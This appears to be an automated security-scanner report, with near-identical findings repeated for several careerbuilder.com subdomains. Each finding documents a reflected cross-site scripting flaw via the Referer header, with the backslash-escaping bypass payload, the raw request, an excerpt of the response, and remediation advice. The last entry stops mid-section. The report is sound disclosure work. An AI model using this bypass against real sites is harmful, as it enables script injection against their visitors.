The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15d13\'%3balert(1)//fe56b96080b was submitted in the Referer HTTP header. This input was echoed as 15d13\\';alert(1)//fe56b96080b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ac.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh030 HTTP/1.1 Host: admin-clerical.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=15d13\'%3balert(1)//fe56b96080b
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 182180 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=dfa4109b3c3d40deaf61fe4e74f21e70-343070817-RS-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650C1115A68087250A1D365AC8E36853AEF9FBAE5174D13819F988A20C05E8A930A791A0ECD58470E83; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:26:56 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:41:56 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL28 Date: Sun, 14 Nov 2010 22:26:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 15d13\\';alert(1)//fe56b96080b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed325\'%3balert(1)//a2006f10fc was submitted in the Referer HTTP header. This input was echoed as ed325\\';alert(1)//a2006f10fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: api.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ed325\'%3balert(1)//a2006f10fc
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9455 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=e3f8d780150c42bdaf0099872eed4f67-343074381-wg-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650F86A26BBE4AD890075BCE825E8CBFE9A17D384E5A683FA7DD6931DBD9BFFFCAAB287C9F0EC9DE396; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:26:21 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR17 Date: Sun, 14 Nov 2010 23:26:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find J ...[SNIP]... s_cb.server='api'; s_cb.eVar8='api.careerbuilder.com/api/info.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ed325\\';alert(1)//a2006f10fc'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7876\'%3balert(1)//2a4ac647379 was submitted in the Referer HTTP header. This input was echoed as f7876\\';alert(1)//2a4ac647379 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /bf.ic/Florida_Miami/ HTTP/1.1 Host: banking-finance.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f7876\'%3balert(1)//2a4ac647379
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 179080 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=98667f98e5c7489a86d60306e6aa7986-343070679-R8-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650DA3FD652AE407CF8145D6807B8F000BC9B21F4E0713C9D1D3275F93A7C063DD1AB9BD0B0FCDB558C; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:24:39 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:39:39 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL8 Date: Sun, 14 Nov 2010 22:24:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - f7876\\';alert(1)//2a4ac647379'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0688\'%3balert(1)//669e64fff42 was submitted in the Referer HTTP header. This input was echoed as c0688\\';alert(1)//669e64fff42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /bf.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh032 HTTP/1.1 Host: banking-finance.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c0688\'%3balert(1)//669e64fff42
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 179397 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=01dad8ee4ec949139c37815160da596c-343070822-R3-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65041B0164C5C0918E352507EB545CE2531FD805E6455470126ADEEDECE63BA37E763FDE2727F5FA09A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:02 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:02 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL3 Date: Sun, 14 Nov 2010 22:27:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - c0688\\';alert(1)//669e64fff42'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dc0a\'%3balert(1)//a91ce667363 was submitted in the Referer HTTP header. This input was echoed as 9dc0a\\';alert(1)//a91ce667363 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /co.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh033 HTTP/1.1 Host: college.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9dc0a\'%3balert(1)//a91ce667363
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 42270 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=b59a2b8ee0ae4555bee231b0664acd74-343070679-XE-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650B94473CF7DE94E8892DC5825580DC9CCCD185D5AE9D0133B629A1425E23712AD8659D87E7028C181; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:24:39 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR45 Date: Sun, 14 Nov 2010 22:24:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... s_cb.server='college'; s_cb.eVar8='college.careerbuilder.com/404.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 9dc0a\\';alert(1)//a91ce667363'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64fda\'%3balert(1)//4ed77ff58f2 was submitted in the Referer HTTP header. This input was echoed as 64fda\\';alert(1)//4ed77ff58f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /co.ic/Florida_Miami/ HTTP/1.1 Host: college.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=64fda\'%3balert(1)//4ed77ff58f2
Response
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 42270 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=4fb5d2d35edf40349a3ae728939a92bb-343070669-XC-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650634FC20916C086ED28CFCFE684229947FE24D274F63DFE59978DD77522C40A9A6E4DC01E731063AB; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:24:28 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR43 Date: Sun, 14 Nov 2010 22:24:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... s_cb.server='college'; s_cb.eVar8='college.careerbuilder.com/404.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 64fda\\';alert(1)//4ed77ff58f2'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46371\'%3balert(1)//92b296703fd was submitted in the Referer HTTP header. This input was echoed as 46371\\';alert(1)//92b296703fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /cs.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh035 HTTP/1.1 Host: customer-service.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=46371\'%3balert(1)//92b296703fd
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 177114 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=fa67f46c03f54f6f9dd76a05c288ab92-343070843-RF-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65097B7B523B2CD453F1F6DB0DD92B6C999C373686678288AF29248C535BC94AE3D440C6CDA795A3C13; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:23 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:23 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL15 Date: Sun, 14 Nov 2010 22:27:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 46371\\';alert(1)//92b296703fd'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f69bb\'%3balert(1)//05bdad76920 was submitted in the Referer HTTP header. This input was echoed as f69bb\\';alert(1)//05bdad76920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /cs.ic/Florida_Miami/ HTTP/1.1 Host: customer-service.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f69bb\'%3balert(1)//05bdad76920
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 177395 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=6a19060872854c8db7978491c000287a-343070711-VK-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6502D8013EFC7A0519483CBFCEAA165ECC72D0AF4E41AE79EDFA9F9CB6364A37007EC36F90FCBB0C975; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:10 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:10 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL32 Date: Sun, 14 Nov 2010 22:25:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - f69bb\\';alert(1)//05bdad76920'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9605\'%3balert(1)//cb2b0ee2b59 was submitted in the Referer HTTP header. This input was echoed as c9605\\';alert(1)//cb2b0ee2b59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh037 HTTP/1.1 Host: engineering.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c9605\'%3balert(1)//cb2b0ee2b59
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 178931 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=a14aa328431d4a2894ea19c923e14acb-343070961-R0-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6505650FD3B34C836BE61CFE4ECC18EF755B35148D8AFD36EA30193A69891746B88916339BA5E7CF03B; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:20 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:21 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL10 Date: Sun, 14 Nov 2010 22:29:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - c9605\\';alert(1)//cb2b0ee2b59'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf320\'%3balert(1)//7b08174fe63 was submitted in the Referer HTTP header. This input was echoed as bf320\\';alert(1)//7b08174fe63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
